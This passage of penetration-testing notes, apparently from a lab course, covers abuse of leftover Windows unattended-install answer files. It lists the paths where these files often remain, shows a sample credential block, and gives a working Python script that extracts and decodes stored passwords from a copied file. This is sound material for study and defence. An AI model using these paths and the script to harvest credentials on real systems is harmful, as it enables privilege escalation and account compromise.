4. Unattended Windows Installations

General

Unattended Windows installations refer to the automated installation of the Windows operating system without user intervention. This is typically done by creating an answer file, which specifies the configuration and installation options that should be used during the installation process. Unattended installations are often used to install Windows on multiple computers in an organization, as they can save time and reduce the risk of errors.

Unattended Windows installations can be abused in several ways:

  • Reading leftover answer files: the answer file is frequently left on the finished host, and the credentials it needed for setup (local administrator, domain join account, auto-logon account) are still inside it. This is the most common case during a post-exploitation privilege escalation.

  • Modifying the answer file: an attacker who can write to the answer file before deployment can change configuration options or add commands that are executed during the installation process.

  • Tampering with the installation media: an attacker could alter the installation media, such as a DVD or USB drive, to include code that is executed during the installation process.

  • Eavesdropping on the installation process: when the answer file or the image is sent over the network (for example by PXE/WDS), an attacker on the same network could intercept it, read any credentials it contains, or modify it in transit.

Commands

When installing Windows on a large number of hosts, administrators may use Windows Deployment Services, which allows a single operating system image to be deployed to several hosts over the network. These installations are referred to as unattended installations because they don't require user interaction. Such installations need an administrator account to perform the initial setup, and the answer file holding that account may be left behind on the machine at one of the following locations:

  • C:\Unattend.xml
  • C:\Windows\Panther\Unattend.xml
  • C:\Windows\Panther\Unattend\Unattend.xml
  • C:\Windows\system32\sysprep.inf
  • C:\Windows\system32\sysprep\sysprep.xml

Inside these files you might encounter credentials. They are either in cleartext, as in the fragment below, or, when the element carries <PlainText>false</PlainText>, stored as the Base64 encoding of the UTF-16LE password with the literal string "Password" appended, which must be stripped after decoding:

<Credentials>
    <Username>Administrator</Username>
    <Domain>thm.local</Domain>
    <Password>MyPassword123</Password>
</Credentials>
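The following is an added example, not part of the original notes: a small offline parser for an answer file copied off a target. It extracts every Username/Domain/Password triple regardless of the XML namespace, and it goes beyond the cleartext fragment above by also handling the <Value>/<PlainText>false</PlainText> form that AutoLogon and UserAccounts blocks use, where the Base64 value decodes to the UTF-16LE password with "Password" appended. The answer file content, the account names and the passwords are all constructed for the example.

```python
import base64
import sys
import xml.etree.ElementTree as ET


def encode_unattend_password(password):
    """Produce the value Windows writes when <PlainText>false</PlainText>:
    Base64(UTF-16LE(password + "Password")). Used here only to build the sample."""
    return base64.b64encode((password + "Password").encode("utf-16-le")).decode()


def decode_unattend_password(value, plaintext):
    """Return the cleartext password for a <Password> or <AdministratorPassword> element.

    For the non-plaintext form the literal suffix "Password" is part of the
    encoded data and must be removed after decoding."""
    if plaintext:
        return value
    decoded = base64.b64decode(value).decode("utf-16-le")
    if decoded.endswith("Password"):
        decoded = decoded[: -len("Password")]
    return decoded


# Constructed sample (not from a real host): the cleartext domain-join block
# shown above plus an AutoLogon block using the Base64 form.
ENCODED_AUTOLOGON_PASSWORD = encode_unattend_password("Deploy!2024")

SAMPLE_UNATTEND = f"""<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="specialize">
    <component name="Microsoft-Windows-UnattendedJoin">
      <Identification>
        <Credentials>
          <Username>Administrator</Username>
          <Domain>thm.local</Domain>
          <Password>MyPassword123</Password>
        </Credentials>
      </Identification>
    </component>
  </settings>
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Username>svc_deploy</Username>
        <Domain>thm.local</Domain>
        <Enabled>true</Enabled>
        <Password>
          <Value>{ENCODED_AUTOLOGON_PASSWORD}</Value>
          <PlainText>false</PlainText>
        </Password>
      </AutoLogon>
    </component>
  </settings>
</unattend>
"""


def _local(tag):
    """Strip the {namespace} prefix ElementTree puts on tag names."""
    return tag.rsplit("}", 1)[-1]


def _child_text(elem, name):
    for child in elem:
        if _local(child.tag) == name and child.text and child.text.strip():
            return child.text.strip()
    return None


def extract_credentials(xml_text):
    """Walk the whole document and collect every password-bearing block.

    Works on full namespaced answer files and on bare pasted fragments."""
    root = ET.fromstring(xml_text)
    creds = []
    for parent in root.iter():
        for pw in parent:
            if _local(pw.tag) not in ("Password", "AdministratorPassword"):
                continue
            value = _child_text(pw, "Value")
            if value is None:
                # Simple form: <Password>cleartext</Password>
                value = (pw.text or "").strip()
                plaintext = True
            else:
                plaintext = (_child_text(pw, "PlainText") or "true").lower() == "true"
            if not value:
                continue
            username = _child_text(parent, "Username")
            if username is None and _local(pw.tag) == "AdministratorPassword":
                username = "Administrator"  # UserAccounts/AdministratorPassword has no Username element
            creds.append({
                "section": _local(parent.tag),
                "username": username,
                "domain": _child_text(parent, "Domain"),
                "password": decode_unattend_password(value, plaintext),
            })
    return creds


if __name__ == "__main__":
    # Usage: python unattend_creds.py C:\Windows\Panther\Unattend.xml  (or no argument for the sample)
    text = open(sys.argv[1], encoding="utf-8-sig").read() if len(sys.argv) > 1 else SAMPLE_UNATTEND
    for c in extract_credentials(text):
        print(f"[{c['section']}] {c['domain']}\\{c['username']} : {c['password']}")
```

On the target itself the quick check is simply to test each of the paths listed above and look for Password elements; this script is for the copied file, and the encode helper exists only so the sample can be built without hand-computing Base64.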